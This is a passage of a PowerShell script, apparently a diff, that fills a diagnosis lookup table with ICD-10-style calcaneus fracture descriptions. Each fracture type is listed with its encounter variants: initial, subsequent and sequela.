calcaneus","Unspecified fracture of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left calcaneus","Unspecified fracture of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left calcaneus","Unspecified fracture of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left calcaneus","Unspecified fracture of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left calcaneus","Unspecified fracture of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left calcaneus","Unspecified fracture of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left calcaneus","Unspecified fracture of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified calcaneus","Unspecified fracture of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified calcaneus","Unspecified fracture of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified calcaneus","Unspecified fracture of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified calcaneus","Unspecified fracture of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified calcaneus","Unspecified fracture of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified calcaneus","Unspecified fracture of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified calcaneus","Unspecified fracture of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right calcaneus","Displaced fracture of body of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right calcaneus","Displaced fracture of body of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right calcaneus","Displaced fracture of body of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right calcaneus","Displaced fracture of body of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right calcaneus","Displaced fracture of body of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right calcaneus","Displaced fracture of body of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right calcaneus","Displaced fracture of body of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left calcaneus","Displaced fracture of body of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left calcaneus","Displaced fracture of body of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left calcaneus","Displaced fracture of body of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left calcaneus","Displaced fracture of body of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left calcaneus","Displaced fracture of body of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left calcaneus","Displaced fracture of body of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left calcaneus","Displaced fracture of body of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified calcaneus","Displaced fracture of body of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified calcaneus","Displaced fracture of body of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified calcaneus","Displaced fracture of body of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified calcaneus","Displaced fracture of body of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified calcaneus","Displaced fracture of body of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified calcaneus","Displaced fracture of body of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified calcaneus","Displaced fracture of body of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right calcaneus","Nondisplaced fracture of body of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right calcaneus","Nondisplaced fracture of body of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right calcaneus","Nondisplaced fracture of body of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right calcaneus","Nondisplaced fracture of body of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right calcaneus","Nondisplaced fracture of body of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right calcaneus","Nondisplaced fracture of body of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right calcaneus","Nondisplaced fracture of body of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left calcaneus","Nondisplaced fracture of body of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left calcaneus","Nondisplaced fracture of body of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left calcaneus","Nondisplaced fracture of body of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left calcaneus","Nondisplaced fracture of body of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left calcaneus","Nondisplaced fracture of body of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left calcaneus","Nondisplaced fracture of body of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left calcaneus","Nondisplaced fracture of body of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified calcaneus","Nondisplaced fracture of body of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified calcaneus","Nondisplaced fracture of body of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified calcaneus","Nondisplaced fracture of body of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified calcaneus","Nondisplaced fracture of body of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified calcaneus","Nondisplaced fracture of body of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified calcaneus","Nondisplaced fracture of body of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified calcaneus","Nondisplaced fracture of body of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of right calcaneus","Displaced fracture of anterior process of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of right calcaneus","Displaced fracture of anterior process of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of right calcaneus","Displaced fracture of anterior process of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of right calcaneus","Displaced fracture of anterior process of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of right calcaneus","Displaced fracture of anterior process of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of right calcaneus","Displaced fracture of anterior process of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of right calcaneus","Displaced fracture of anterior process of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of left calcaneus","Displaced fracture of anterior process of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of left calcaneus","Displaced fracture of anterior process of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of left calcaneus","Displaced fracture of anterior process of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of left calcaneus","Displaced fracture of anterior process of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of left calcaneus","Displaced fracture of anterior process of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of left calcaneus","Displaced fracture of anterior process of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of left calcaneus","Displaced fracture of anterior process of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of unspecified calcaneus","Displaced fracture of anterior process of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of unspecified calcaneus","Displaced fracture of anterior process of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of unspecified calcaneus","Displaced fracture of anterior process of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of unspecified calcaneus","Displaced fracture of anterior process of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of unspecified calcaneus","Displaced fracture of anterior process of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of unspecified calcaneus","Displaced fracture of anterior process of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of anterior process of unspecified calcaneus","Displaced fracture of anterior process of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of right calcaneus","Nondisplaced fracture of anterior process of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of right calcaneus","Nondisplaced fracture of anterior process of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of right calcaneus","Nondisplaced fracture of anterior process of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of right calcaneus","Nondisplaced fracture of anterior process of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of right calcaneus","Nondisplaced fracture of anterior process of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of right calcaneus","Nondisplaced fracture of anterior process of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of right calcaneus","Nondisplaced fracture of anterior process of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of left calcaneus","Nondisplaced fracture of anterior process of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of left calcaneus","Nondisplaced fracture of anterior process of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of left calcaneus","Nondisplaced fracture of anterior process of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of left calcaneus","Nondisplaced fracture of anterior process of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of left calcaneus","Nondisplaced fracture of anterior process of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of left calcaneus","Nondisplaced fracture of anterior process of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of left calcaneus","Nondisplaced fracture of anterior process of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of unspecified calcaneus","Nondisplaced fracture of anterior process of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of unspecified calcaneus","Nondisplaced fracture of anterior process of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of unspecified calcaneus","Nondisplaced fracture of anterior process of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of unspecified calcaneus","Nondisplaced fracture of anterior process of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of unspecified calcaneus","Nondisplaced fracture of anterior process of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of unspecified calcaneus","Nondisplaced fracture of anterior process of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of anterior process of unspecified calcaneus","Nondisplaced fracture of anterior process of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of right calcaneus","Displaced avulsion fracture of tuberosity of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of right calcaneus","Displaced avulsion fracture of tuberosity of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of right calcaneus","Displaced avulsion fracture of tuberosity of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of right calcaneus","Displaced avulsion fracture of tuberosity of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of right calcaneus","Displaced avulsion fracture of tuberosity of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of right calcaneus","Displaced avulsion fracture of tuberosity of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of right calcaneus","Displaced avulsion fracture of tuberosity of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of left calcaneus","Displaced avulsion fracture of tuberosity of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of left calcaneus","Displaced avulsion fracture of tuberosity of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of left calcaneus","Displaced avulsion fracture of tuberosity of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of left calcaneus","Displaced avulsion fracture of tuberosity of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of left calcaneus","Displaced avulsion fracture of tuberosity of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of left calcaneus","Displaced avulsion fracture of tuberosity of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of left calcaneus","Displaced avulsion fracture of tuberosity of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of unspecified calcaneus","Displaced avulsion fracture of tuberosity of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of unspecified calcaneus","Displaced avulsion fracture of tuberosity of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of unspecified calcaneus","Displaced avulsion fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of unspecified calcaneus","Displaced avulsion fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of unspecified calcaneus","Displaced avulsion fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of unspecified calcaneus","Displaced avulsion fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture of tuberosity of unspecified calcaneus","Displaced avulsion fracture of tuberosity of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of right calcaneus","Nondisplaced avulsion fracture of tuberosity of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of right calcaneus","Nondisplaced avulsion fracture of tuberosity of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of right calcaneus","Nondisplaced avulsion fracture of tuberosity of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of right calcaneus","Nondisplaced avulsion fracture of tuberosity of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of right calcaneus","Nondisplaced avulsion fracture of tuberosity of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of right calcaneus","Nondisplaced avulsion fracture of tuberosity of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of right calcaneus","Nondisplaced avulsion fracture of tuberosity of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of left calcaneus","Nondisplaced avulsion fracture of tuberosity of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of left calcaneus","Nondisplaced avulsion fracture of tuberosity of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of left calcaneus","Nondisplaced avulsion fracture of tuberosity of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of left calcaneus","Nondisplaced avulsion fracture of tuberosity of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of left calcaneus","Nondisplaced avulsion fracture of tuberosity of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of left calcaneus","Nondisplaced avulsion fracture of tuberosity of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of left calcaneus","Nondisplaced avulsion fracture of tuberosity of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus","Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus","Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus","Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus","Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus","Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus","Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus","Nondisplaced avulsion fracture of tuberosity of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of right calcaneus","Displaced other fracture of tuberosity of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of right calcaneus","Displaced other fracture of tuberosity of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of right calcaneus","Displaced other fracture of tuberosity of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of right calcaneus","Displaced other fracture of tuberosity of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of right calcaneus","Displaced other fracture of tuberosity of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of right calcaneus","Displaced other fracture of tuberosity of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of right calcaneus","Displaced other fracture of tuberosity of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of left calcaneus","Displaced other fracture of tuberosity of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of left calcaneus","Displaced other fracture of tuberosity of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of left calcaneus","Displaced other fracture of tuberosity of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of left calcaneus","Displaced other fracture of tuberosity of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of left calcaneus","Displaced other fracture of tuberosity of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of left calcaneus","Displaced other fracture of tuberosity of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of left calcaneus","Displaced other fracture of tuberosity of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of unspecified calcaneus","Displaced other fracture of tuberosity of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of unspecified calcaneus","Displaced other fracture of tuberosity of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of unspecified calcaneus","Displaced other fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of unspecified calcaneus","Displaced other fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of unspecified calcaneus","Displaced other fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of unspecified calcaneus","Displaced other fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced other fracture of tuberosity of unspecified calcaneus","Displaced other fracture of tuberosity of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of right calcaneus","Nondisplaced other fracture of tuberosity of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of right calcaneus","Nondisplaced other fracture of tuberosity of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of right calcaneus","Nondisplaced other fracture of tuberosity of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of right calcaneus","Nondisplaced other fracture of tuberosity of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of right calcaneus","Nondisplaced other fracture of tuberosity of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of right calcaneus","Nondisplaced other fracture of tuberosity of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of right calcaneus","Nondisplaced other fracture of tuberosity of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of left calcaneus","Nondisplaced other fracture of tuberosity of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of left calcaneus","Nondisplaced other fracture of tuberosity of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of left calcaneus","Nondisplaced other fracture of tuberosity of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of left calcaneus","Nondisplaced other fracture of tuberosity of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of left calcaneus","Nondisplaced other fracture of tuberosity of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of left calcaneus","Nondisplaced other fracture of tuberosity of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of left calcaneus","Nondisplaced other fracture of tuberosity of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of unspecified calcaneus","Nondisplaced other fracture of tuberosity of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of unspecified calcaneus","Nondisplaced other fracture of tuberosity of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of unspecified calcaneus","Nondisplaced other fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of unspecified calcaneus","Nondisplaced other fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of unspecified calcaneus","Nondisplaced other fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of unspecified calcaneus","Nondisplaced other fracture of tuberosity of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced other fracture of tuberosity of unspecified calcaneus","Nondisplaced other fracture of tuberosity of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of right calcaneus","Displaced other extraarticular fracture of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of right calcaneus","Displaced other extraarticular fracture of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of right calcaneus","Displaced other extraarticular fracture of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of right calcaneus","Displaced other extraarticular fracture of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of right calcaneus","Displaced other extraarticular fracture of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of right calcaneus","Displaced other extraarticular fracture of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of right calcaneus","Displaced other extraarticular fracture of right calcaneus, sequela") + $null = 